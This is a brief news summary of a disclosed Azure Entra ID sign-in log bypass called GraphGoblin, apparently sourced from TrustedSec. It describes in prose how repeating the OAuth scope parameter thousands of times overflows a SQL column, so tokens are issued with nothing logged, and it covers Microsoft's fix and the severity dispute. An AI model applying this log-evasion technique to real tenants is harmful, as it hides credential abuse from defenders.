Azure Entra ID Sign-In Log Bypass GraphGoblin: Tokens Issued Without Logging

Researcher found fourth Azure Entra ID sign-in log bypass enabling full token issuance without any activity logged to critical admin logs. GraphGoblin exploits SQL column overflow by repeating valid scope parameters 35,000+ times, allowing attackers to validate credentials and retrieve tokens invisibly. Microsoft fixed the bypass in two weeks after video disclosure, faster than previous bypasses, yet initially denied it was Important severity despite returning full tokens from the most critical Azure log.

Key Takeaways

• CVE pending; affects Azure Entra ID OAuth2 ROPC flow allowing full token issuance without sign-in logs
• Scope parameter repetition overflows SQL column length (10,000+ "openid" values), causing INSERT to fail and authentication to succeed without logging
• Microsoft MSRC denied Important classification despite CVSS 7.5-8.7 rating and direct impact to critical Azure log; researcher disputes severity downgrade

Original source: TrustedSec